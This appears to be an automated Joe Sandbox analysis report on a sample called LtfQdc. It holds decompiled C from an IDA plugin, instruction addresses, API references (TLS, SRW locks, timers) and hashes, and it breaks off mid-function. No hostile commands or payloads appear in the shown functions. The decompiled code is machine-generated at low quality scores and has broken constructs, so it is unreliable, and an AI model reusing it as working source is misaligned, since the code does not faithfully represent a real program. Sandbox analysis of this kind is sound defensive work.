0x00d144ec
0x00000000
0x00d144ee
0x00d144ee
0x00d144f0
0x00000000
0x00d144f2
0x00d144f2
0x00d144f7
0x00d144fb
0x00d144fb
0x00d144fc
0x00000000
0x00d144fc
0x00d144f0
0x00d144c7
0x00d144c7
0x00d144c9
0x00000000
0x00d144cb
0x00d144cb
0x00d144cd
0x00000000
0x00d144cf
0x00d144e0
0x00000000
0x00d144e5
0x00d144cd
0x00d144c9
0x00d14482
0x00d14482
0x00d14486
0x00000000
0x00d1448c
0x00d1448c
0x00d1448e
0x00000000
0x00d14494
0x00d1449b
0x00d144a3
0x00d144a7
0x00d144a9
0x00d144ac
0x00d144b1
0x00d144b2
0x00000000
0x00d144b2
0x00d144ac
0x00000000
0x00d144a7
0x00d1448e
0x00d14486
0x00d14461
0x00d14461
0x00000000
0x00d14461
0x00d1443e
0x00d1443e
0x00d14443
0x00d14448
0x00000000
0x00d1444a
0x00d1444c
0x00d14455
0x00d14464
0x00d14466
0x00d14525
0x00d14525
0x00d1452a
0x00d1452b
0x00d1452d
0x00d14532
0x00d14537
0x00d1453a
0x00d1453d
0x00d14540
0x00d14549
0x00d14549
0x00d14542
0x00d14542
0x00d14542
0x00d1454c
0x00d14550
0x00d14553
0x00d14554
0x00d14555
0x00d14556
0x00d14559
0x00d14562
0x00d14562
0x00d14565
0x00d1459b
0x00d14567
0x00d14567
0x00d14567
0x00d1456a
0x00d14581
0x00d14581
0x00d1456a
0x00d145a0
0x00d145aa
0x00d145b6
0x00d14474
0x00d14474
0x00d14479
0x00d1447a
0x00d144b4
0x00d144bb
0x00d144ff
0x00d144ff
0x00d14506
0x00d14515
0x00d14518
0x00d14524
0x00d14524
0x00d14466
0x00d14448
0x00000000
0x00000000
0x00000000
0x00d14417

APIs

___AdjustPointer.LIBCMT ref: 00D144B4
___AdjustPointer.LIBCMT ref: 00D144D7
___AdjustPointer.LIBCMT ref: 00D14573

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 7eca4b17ec20bf6c76160805549109baebc1c62f88f098eeac6c25c127213e43
Instruction ID: aff16c2744c30c60563ef5bcd7af66fff3fe28c40022bc5539002a272e78dd84
Opcode Fuzzy Hash: 7eca4b17ec20bf6c76160805549109baebc1c62f88f098eeac6c25c127213e43
Instruction Fuzzy Hash: E451BE7260120ABFEB298F54E841BFA77A6EF04711F18442EE94557291EB71E881DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00CC94D0 Relevance: 6.2, APIs: 4, Instructions: 151timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00CC952E
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CC9540
GetSystemTimeAsFileTime.KERNEL32(?), ref: 00CC95E6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CC95F4

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 1518329722-0
Opcode ID: 7fe6de88fd8a95601dfa32100acc9927ffba6425daa59fdfac1be16458fdeb3c
Instruction ID: 72165df931bc3987f37d314b85650c59993f2582d7be78e86eaf6757e70882b7
Opcode Fuzzy Hash: 7fe6de88fd8a95601dfa32100acc9927ffba6425daa59fdfac1be16458fdeb3c
Instruction Fuzzy Hash: FA515E75A043029FD714DF28EC85B4AB7E1EB88361F154A2CF8A9C73E0DB349945CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CD7340 Relevance: 6.1, APIs: 4, Instructions: 142
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00CD7340(void* __ebx, void* __edx) {
				signed int _v16;
				char _v2061;
				char _v2064;
				long _v2068;
				void* __edi;
				void* __esi;
				signed int _t33;
				intOrPtr _t36;
				signed int _t43;
				intOrPtr _t44;
				void* _t56;
				void* _t59;
				void* _t61;
				long _t62;
				signed int _t63;
				intOrPtr _t64;
				void* _t69;
				intOrPtr _t72;
				long* _t75;
				long _t76;
				signed int _t77;
				signed int _t78;
				void* _t80;
				void* _t81;
				void* _t95;
				void* _t98;

				_t69 = __edx;
				_t61 = __ebx;
				_t81 = _t80 - 0x808;
				_t33 =  *0xd40014; // 0xfbddd969
				_v16 = _t33 ^ _t78;
				_v2068 = 0xffffffff;
				_t62 =  *0xd43d68; // 0xffffffff
				_v2068 = _t62;
				if(_t62 != 0xffffffff) {
					L8:
					if((TlsGetValue(_t62) & 0x00000003) != 0) {
						asm("int3");
						asm("ud2");
						goto L11;
					} else {
						_t74 =  &_v2064;
						E00D011A0( &_v2064,  &_v2064, 0, 0x800);
						L00CE5B30(_v2068,  &_v2061);
						_t77 = L00CFDC23();
						L00D00C20(_t49,  &_v2064, 0x800);
						E00CFE643(L00CE5B30(_v2068, _t77 | 0x00000003), _t61, _v16 ^ _t78, _t69, _t74, _t77, 0x800);
						return _t77;
					}
				} else {
					_t75 =  &_v2068;
					_t56 = L00CE5B00(_t75);
					_t81 = _t81 + 4;
					if(_t56 == 0) {
						L11:
						asm("int3");
						asm("ud2");
						goto L12;
					} else {
						_t62 = _v2068;
						if(_t62 != 0xffffffff) {
							L6:
							asm("lock cmpxchg [0xd43d68], ecx");
							if(_t95 != 0) {
								L00CE5B20(_t62);
								_t81 = _t81 + 4;
								_t62 =  *0xd43d68; // 0xffffffff
								_v2068 = _t62;
							}
							goto L8;
						} else {
							_t59 = L00CE5B00(_t75);
							_t81 = _t81 + 4;
							if(_t59 == 0) {
								L12:
								asm("int3");
								asm("ud2");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t78);
								_push(_t75);
								_t76 = _t62;
								_t36 =  *0xd54adc;
								_t63 =  *0xd43e38; // 0x0
								_t70 =  *[fs:0x2c];
								_t64 =  *((intOrPtr*)( *[fs:0x2c] + _t63 * 4));
								__eflags = _t36 -  *((intOrPtr*)(_t64 + 4));
								if(_t36 >  *((intOrPtr*)(_t64 + 4))) {
									_t36 = L00CFDC67(_t36, 0xd54adc);
									__eflags =  *0xd54adc - 0xffffffff;
									if( *0xd54adc == 0xffffffff) {
										_push(4);
										_t44 = L00CFDBBC();
										L00CC8CE0(_t44);
										 *0xd54ad8 = _t44;
										_t36 = L00CFDCDD(0xd54adc);
									}
								}
								_t72 =  *0xd54ad8;
								__imp__TryAcquireSRWLockExclusive(_t72);
								__eflags = _t36;
								if(__eflags == 0) {
									L00CC8CF0(_t61, _t72, _t70, __eflags, _t98);
								}
								 *((intOrPtr*)(0xd53ed8 + ( *_t76 +  *_t76 * 2) * 4)) = 0;
								 *((intOrPtr*)(0xd53edc + ( *_t76 +  *_t76 * 2) * 4)) = 0;
								_t43 =  *_t76 +  *_t76 * 2;
								_t30 = 0xd53ee0 + _t43 * 4;
								 *_t30 =  *((intOrPtr*)(0xd53ee0 + _t43 * 4)) + 1;
								__eflags =  *_t30;
								__imp__ReleaseSRWLockExclusive(_t72);
								 *_t76 = 0xffffffff;
								return _t43;
							} else {
								_t95 = _v2068 - 0xffffffff;
								if(_t95 == 0) {
									goto L12;
								} else {
									L00CE5B20(0xffffffff);
									_t81 = _t81 + 4;
									_t62 = _v2068;
									goto L6;
								}
							}
						}
					}
				}
			}

0x00cd7340
0x00cd7340
0x00cd7345
0x00cd734b
0x00cd7352
0x00cd7355
0x00cd735f
0x00cd7365
0x00cd736e
0x00cd73e4
0x00cd73ed
0x00cd7462
0x00cd7463
0x00000000
0x00cd73ef
0x00cd73ef
0x00cd73fd
0x00cd7412
0x00cd7427
0x00cd7430
0x00cd7451
0x00cd7461
0x00cd7461
0x00cd7370
0x00cd7370
0x00cd7377
0x00cd737c
0x00cd7381
0x00cd7465
0x00cd7465
0x00cd7466
0x00000000
0x00cd7387
0x00cd7387
0x00cd7390
0x00cd73c0
0x00cd73c5
0x00cd73cd
0x00cd73d0
0x00cd73d5
0x00cd73d8
0x00cd73de
0x00cd73de
0x00000000
0x00cd7392
0x00cd7393
0x00cd7398
0x00cd739d
0x00cd7468
0x00cd7468
0x00cd7469
0x00cd746b
0x00cd746c
0x00cd746d
0x00cd746e
0x00cd746f
0x00cd7470
0x00cd7474
0x00cd7475
0x00cd7477
0x00cd747c
0x00cd7482
0x00cd7489
0x00cd748c
0x00cd7492
0x00cd74f0
0x00cd74f8
0x00cd74ff
0x00cd7501
0x00cd7503
0x00cd750f
0x00cd7514
0x00cd751f
0x00cd7524
0x00cd74ff
0x00cd7494
0x00cd749b
0x00cd74a1
0x00cd74a3
0x00cd74e4
0x00cd74e4
0x00cd74aa
0x00cd74ba
0x00cd74c7
0x00cd74ca
0x00cd74ca
0x00cd74ca
0x00cd74d2
0x00cd74d8
0x00cd74e1
0x00cd73a3
0x00cd73a3
0x00cd73aa
0x00000000
0x00cd73b0
0x00cd73b2
0x00cd73b7
0x00cd73ba
0x00000000
0x00cd73ba
0x00cd73aa
0x00cd739d
0x00cd7390
0x00cd7381

APIs

TlsGetValue.KERNEL32(FFFFFFFF), ref: 00CD73E5

Part of subcall function 00CE5B00: TlsAlloc.KERNEL32(?,00CD737C,FFFFFFFF), ref: 00CE5B03

TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00CD749B
ReleaseSRWLockExclusive.KERNEL32(?), ref: 00CD74D2
__Init_thread_header.LIBCMT ref: 00CD74F0

Part of subcall function 00CE5B20: TlsFree.KERNEL32(00CD73D5,?,00CD73D5,?), ref: 00CE5B26

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ExclusiveLock$AcquireAllocFreeInit_thread_headerReleaseValue
String ID:
API String ID: 734190636-0
Opcode ID: 9a6cfea1933766d694dc3eff54aa6dc29895d876951e6140f4c7734f2986ccbf
Instruction ID: bf8dfc1cf9ff4fbe0533bc2341354c9bb60014a70a683c697f955326eee1af7b
Opcode Fuzzy Hash: 9a6cfea1933766d694dc3eff54aa6dc29895d876951e6140f4c7734f2986ccbf
Instruction Fuzzy Hash: 9641F271D002089BDB20AF28EC01AA937A5BF41325F04477AFA65973D1EF715A55CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00CD7030 Relevance: 6.1, APIs: 4, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00CD7030(void* __fp0) {
				signed int _v20;
				char _v2067;
				char _v2068;
				char _v5132;
				char _v5140;
				signed int _v5144;
				signed int _v5148;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t31;
				signed int _t33;
				intOrPtr _t39;
				signed char _t43;
				intOrPtr _t46;
				signed int _t49;
				char* _t50;
				signed int _t53;
				signed int _t54;
				signed int _t57;
				intOrPtr* _t60;
				intOrPtr _t65;
				signed int _t67;
				void* _t68;
				void* _t71;
				void* _t72;
				void* _t85;

				_t85 = __fp0;
				L00CFEF60(0x140c);
				_t31 =  *0xd40014; // 0xfbddd969
				_v20 = _t31 ^ _t67;
				_t33 =  *0xd43d68; // 0xffffffff
				if(_t33 == 0xffffffff) {
					L17:
					__eflags = _v20 ^ _t67;
					return E00CFE643(_t33, _t49, _v20 ^ _t67, _t62, 1, _t65);
				}
				_t49 = _t33;
				if((_t49 & 0x00000003) == 0) {
					goto L17;
				}
				_t49 = _t49 & 0xfffffffc;
				L00D00C20( &_v2068, _t49, 0x800);
				_t53 =  *0xd43d68; // 0xffffffff
				_v5144 = _t53;
				L00CE5B30(_t53,  &_v2067);
				_t71 = _t68 + 0x14;
				if(_t49 != 0) {
					L00CFDC2C(_t49);
					_t71 = _t71 + 4;
				}
				_t39 =  *0xd54adc;
				_t54 =  *0xd43e38; // 0x0
				_t62 =  *[fs:0x2c];
				if(_t39 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t54 * 4)) + 4))) {
					_t39 = L00CFDC67(_t39, 0xd54adc);
					_t71 = _t71 + 4;
					__eflags =  *0xd54adc - 0xffffffff;
					if(__eflags == 0) {
						_push(4);
						_t46 = L00CFDBBC();
						L00CC8CE0(_t46);
						 *0xd54ad8 = _t46;
						_t39 = L00CFDCDD(0xd54adc);
						_t71 = _t71 + 8;
					}
				}
				_t65 =  *0xd54ad8;
				__imp__TryAcquireSRWLockExclusive(_t65);
				if(_t39 == 0) {
					L00CC8CF0(_t49, _t65, _t62, __eflags, _t85);
				}
				L00D00C20( &_v5140, 0xd53ed8, 0xc00);
				_t72 = _t71 + 0xc;
				__imp__ReleaseSRWLockExclusive(_t65);
				_t43 = 1;
				_t57 = 0x101;
				while((_t43 & 0x00000001) != 0) {
					_v5148 = _t57;
					_t50 =  &_v5132;
					_t43 = 0;
					do {
						_t65 =  *((intOrPtr*)(_t67 + 0xfffffffffffff7f0));
						if(_t65 != 0 &&  *((intOrPtr*)(_t49 - 8)) != 0 &&  *((intOrPtr*)(_t67 + 0xfffffffffffff7f4)) ==  *_t49) {
							_t60 =  *((intOrPtr*)(_t49 - 4));
							if(_t60 != 0) {
								 *((intOrPtr*)(_t67 + 0xfffffffffffff7f0)) = 0;
								 *0xd57000();
								 *_t60(_t65);
								_t72 = _t72 + 4;
								_t43 = 1;
							}
						}
						_t49 = _t50 + 0xc;
					} while (1 != 0x100);
					_t57 = _v5148 - 1;
					__eflags = _t57;
					if(_t57 == 0) {
						break;
					}
				}
				_t33 = L00CE5B30(_v5144, 2);
				_t68 = _t72 + 8;
				goto L17;
			}

0x00cd7030
0x00cd703b
0x00cd7040
0x00cd7047
0x00cd704a
0x00cd7052
0x00cd718a
0x00cd718d
0x00cd719e
0x00cd719e
0x00cd705f
0x00cd7064
0x00000000
0x00000000
0x00cd706a
0x00cd707a
0x00cd7082
0x00cd708f
0x00cd7096
0x00cd709b
0x00cd70a0
0x00cd70a3
0x00cd70a8
0x00cd70a8
0x00cd70ab
0x00cd70b0
0x00cd70b6
0x00cd70c6
0x00cd71b0
0x00cd71b5
0x00cd71b8
0x00cd71bf
0x00cd71c5
0x00cd71c7
0x00cd71d3
0x00cd71d8
0x00cd71e3
0x00cd71e8
0x00cd71e8
0x00cd71bf
0x00cd70cc
0x00cd70d3
0x00cd70db
0x00cd71a1
0x00cd71a1
0x00cd70f2
0x00cd70f7
0x00cd70fb
0x00cd7101
0x00cd7103
0x00cd7119
0x00cd711d
0x00cd7125
0x00cd712b
0x00cd713c
0x00cd713c
0x00cd7145
0x00cd7158
0x00cd715d
0x00cd715f
0x00cd716a
0x00cd7171
0x00cd7173
0x00cd7176
0x00cd7176
0x00cd715d
0x00cd7131
0x00cd7134
0x00cd7116
0x00cd7116
0x00cd7117
0x00000000
0x00000000
0x00cd7117
0x00cd7182
0x00cd7187
0x00000000

APIs

TlsGetValue.KERNEL32(FFFFFFFF), ref: 00CD7059
TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00CD70D3
ReleaseSRWLockExclusive.KERNEL32(?), ref: 00CD70FB
__Init_thread_header.LIBCMT ref: 00CD71B0

Part of subcall function 00CE5B30: TlsSetValue.KERNEL32(FFFFFFFF,00CD7417,?,00CD7417,FFFFFFFF,?), ref: 00CE5B39

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ExclusiveLockValue$AcquireInit_thread_headerRelease
String ID:
API String ID: 4057198150-0
Opcode ID: c217a717dd605c6f243bd1637879aef15d00863477c2286cdd23a35fc7a89928
Instruction ID: 652f5959c383d8b850088acd11b94c3def833d0143edc024da56384aea238fff
Opcode Fuzzy Hash: c217a717dd605c6f243bd1637879aef15d00863477c2286cdd23a35fc7a89928
Instruction Fuzzy Hash: 56411C71A04209ABDB20DF64DC85BAE3365EF00315F140776EA1A97391EB705E89CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00CEC1F0 Relevance: 6.1, APIs: 4, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00CEC1F0(intOrPtr* _a4) {
				void* _v16;
				signed int _v24;
				signed int _v28;
				union _LARGE_INTEGER _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t42;
				signed int _t49;
				intOrPtr _t56;
				signed int _t74;
				signed int _t79;
				signed int _t80;
				intOrPtr* _t81;
				signed int _t87;

				_t81 = _a4;
				_t42 =  *0xd40014; // 0xfbddd969
				_v24 = _t42 ^ _t87;
				_v28 = 0;
				_v32.LowPart = 0;
				QueryPerformanceCounter( &_v32);
				_t80 = _v32.LowPart;
				_t61 = _v28;
				asm("sbb eax, ebx");
				if(0x7bd05af6 < _t80) {
					_v48 =  *0xd560c8;
					_v44 =  *0xd560cc;
					_t49 = L00D1BF10(_t80, _t61,  *0xd560c8,  *0xd560cc);
					_v68 = _t61;
					_v56 = _t49 * _v64;
					_v52 = _t74 * 0xf4240;
					_t80 = _t80 - _v56;
					_t61 = _v68;
					asm("sbb ebx, esi");
					_v68 = _t49 * 0xf4240;
					_t79 = (_t80 * 0xf4240 >> 0x20) + _v68 * 0xf4240;
					_t56 = L00D1BF10(_t80 * 0xf4240, _t79, _v64, _v60) + _v84;
					asm("adc edx, esi");
					_t81 = _a4;
				} else {
					_t79 = _t80 * 0xf4240 >> 0x20;
					_t56 = L00D1BF10(_t80 * 0xf4240, _t61 * 0xf4240 + _t79,  *0xd560c8,  *0xd560cc);
				}
				 *_t81 = _t56;
				 *(_t81 + 4) = _t79;
				E00CFE643(_t56, _t61, _v24 ^ _t87, _t79, _t80, _t81);
				return _t81;
			}

0x00cec1fc
0x00cec1ff
0x00cec206
0x00cec20a
0x00cec212
0x00cec21f
0x00cec225
0x00cec229
0x00cec239
0x00cec23b
0x00cec26b
0x00cec275
0x00cec27d
0x00cec286
0x00cec290
0x00cec2a3
0x00cec2ac
0x00cec2b0
0x00cec2b4
0x00cec2bd
0x00cec2d1
0x00cec2e2
0x00cec2e6
0x00cec2e8
0x00cec23d
0x00cec244
0x00cec25c
0x00cec25c
0x00cec2eb
0x00cec2ed
0x00cec2f6
0x00cec304

APIs

QueryPerformanceCounter.KERNEL32(00000000), ref: 00CEC21F
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CEC25C
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CEC27D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CEC2DD

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$CounterPerformanceQuery
String ID:
API String ID: 374826692-0
Opcode ID: 9dd581189b92cac3da6391378a777595cff31486ad7f6f05d4b6181c3014bc0e
Instruction ID: 6e5374b7bf3490ba7ca68d5913ea152afa67d4e3361762540345dfe9d4bc171b
Opcode Fuzzy Hash: 9dd581189b92cac3da6391378a777595cff31486ad7f6f05d4b6181c3014bc0e
Instruction Fuzzy Hash: 263174B16043049FC708DF58DD8552BFBE8EBCC710F00892EBA88D73A1D73598449BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00CD7220 Relevance: 6.1, APIs: 4, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00CD7220(void* __ebx, signed int* __ecx, void* __fp0, intOrPtr _a4) {
				signed int _v20;
				signed int _v40;
				char _v2065;
				char _v2068;
				long _v2072;
				long _v2092;
				void* __edi;
				void* __esi;
				long _t54;
				intOrPtr _t55;
				signed int _t58;
				signed int _t60;
				signed int _t61;
				signed char _t63;
				signed int _t64;
				signed int _t71;
				intOrPtr _t72;
				void* _t81;
				signed int _t84;
				signed int _t87;
				intOrPtr _t89;
				signed int _t93;
				signed int _t96;
				void* _t100;
				long _t102;
				signed int _t103;
				intOrPtr _t104;
				void* _t111;
				intOrPtr _t114;
				intOrPtr _t115;
				signed int* _t123;
				long _t124;
				signed int _t126;
				signed int _t130;
				signed int _t132;
				void* _t133;
				void* _t152;

				_t152 = __fp0;
				_t92 = __ebx;
				_push(__ebx);
				_t123 = __ecx;
				_t54 =  *0xd43d68; // 0xffffffff
				if(_t54 == 0xffffffff || (TlsGetValue(_t54) & 0x00000003) == 0) {
					L16();
				}
				_t55 =  *0xd54adc;
				_t96 =  *0xd43e38; // 0x0
				_t110 =  *[fs:0x2c];
				if(_t55 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t96 * 4)) + 4))) {
					_t55 = L00CFDC67(_t55, 0xd54adc);
					_t132 = _t132 + 4;
					__eflags =  *0xd54adc - 0xffffffff;
					if(__eflags == 0) {
						_push(4);
						_t89 = L00CFDBBC();
						L00CC8CE0(_t89);
						 *0xd54ad8 = _t89;
						_t55 = L00CFDCDD(0xd54adc);
						_t132 = _t132 + 8;
					}
				}
				_t114 =  *0xd54ad8;
				__imp__TryAcquireSRWLockExclusive(_t114);
				if(_t55 == 0) {
					L00CC8CF0(_t92, _t114, _t110, __eflags, _t152);
				}
				_t100 =  *0xd53ed4 + 1;
				_t111 = 0;
				while(1) {
					_t93 = _t100 + _t111 & 0x000000ff;
					_t58 = _t93 + _t93 * 2;
					if( *((intOrPtr*)(0xd53ed8 + _t58 * 4)) == 0) {
						break;
					}
					_t111 = _t111 + 1;
					if(_t111 != 0x100) {
						continue;
					} else {
					}
					L10:
					__imp__ReleaseSRWLockExclusive(_t114);
					if( *_t123 >= 0x100) {
						asm("int3");
						asm("ud2");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_t130 = _t132;
						_push(_t114);
						_push(_t123);
						_t133 = _t132 - 0x808;
						_t61 =  *0xd40014; // 0xfbddd969
						_v40 = _t61 ^ _t130;
						_v2092 = 0xffffffff;
						_t102 =  *0xd43d68; // 0xffffffff
						_v2092 = _t102;
						__eflags = _t102 - 0xffffffff;
						if(_t102 != 0xffffffff) {
							L24:
							_t63 = TlsGetValue(_t102);
							__eflags = _t63 & 0x00000003;
							if((_t63 & 0x00000003) != 0) {
								asm("int3");
								asm("ud2");
								goto L27;
							} else {
								_t118 =  &_v2068;
								E00D011A0( &_v2068,  &_v2068, 0, 0x800);
								L00CE5B30(_v2072,  &_v2065);
								_t126 = L00CFDC23();
								L00D00C20(_t77,  &_v2068, 0x800);
								_t81 = L00CE5B30(_v2072, _t126 | 0x00000003);
								__eflags = _v20 ^ _t130;
								E00CFE643(_t81, _t93, _v20 ^ _t130, _t111, _t118, _t126, 0x800);
								return _t126;
							}
						} else {
							_t123 =  &_v2072;
							_t84 = L00CE5B00(_t123);
							_t133 = _t133 + 4;
							__eflags = _t84;
							if(_t84 == 0) {
								L27:
								asm("int3");
								asm("ud2");
								goto L28;
							} else {
								_t102 = _v2072;
								__eflags = _t102 - 0xffffffff;
								if(__eflags != 0) {
									L22:
									asm("lock cmpxchg [0xd43d68], ecx");
									if(__eflags != 0) {
										L00CE5B20(_t102);
										_t133 = _t133 + 4;
										_t102 =  *0xd43d68; // 0xffffffff
										_v2072 = _t102;
									}
									goto L24;
								} else {
									_t87 = L00CE5B00(_t123);
									_t133 = _t133 + 4;
									__eflags = _t87;
									if(_t87 == 0) {
										L28:
										asm("int3");
										asm("ud2");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t130);
										_push(_t114);
										_push(_t123);
										_t124 = _t102;
										_t64 =  *0xd54adc;
										_t103 =  *0xd43e38; // 0x0
										_t112 =  *[fs:0x2c];
										_t104 =  *((intOrPtr*)( *[fs:0x2c] + _t103 * 4));
										__eflags = _t64 -  *((intOrPtr*)(_t104 + 4));
										if(_t64 >  *((intOrPtr*)(_t104 + 4))) {
											_t64 = L00CFDC67(_t64, 0xd54adc);
											__eflags =  *0xd54adc - 0xffffffff;
											if( *0xd54adc == 0xffffffff) {
												_push(4);
												_t72 = L00CFDBBC();
												L00CC8CE0(_t72);
												 *0xd54ad8 = _t72;
												_t64 = L00CFDCDD(0xd54adc);
											}
										}
										_t115 =  *0xd54ad8;
										__imp__TryAcquireSRWLockExclusive(_t115);
										__eflags = _t64;
										if(__eflags == 0) {
											L00CC8CF0(_t93, _t115, _t112, __eflags, _t152);
										}
										 *((intOrPtr*)(0xd53ed8 + ( *_t124 +  *_t124 * 2) * 4)) = 0;
										 *((intOrPtr*)(0xd53edc + ( *_t124 +  *_t124 * 2) * 4)) = 0;
										_t71 =  *_t124 +  *_t124 * 2;
										_t51 = 0xd53ee0 + _t71 * 4;
										 *_t51 =  *(0xd53ee0 + _t71 * 4) + 1;
										__eflags =  *_t51;
										__imp__ReleaseSRWLockExclusive(_t115);
										 *_t124 = 0xffffffff;
										return _t71;
									} else {
										__eflags = _v2072 - 0xffffffff;
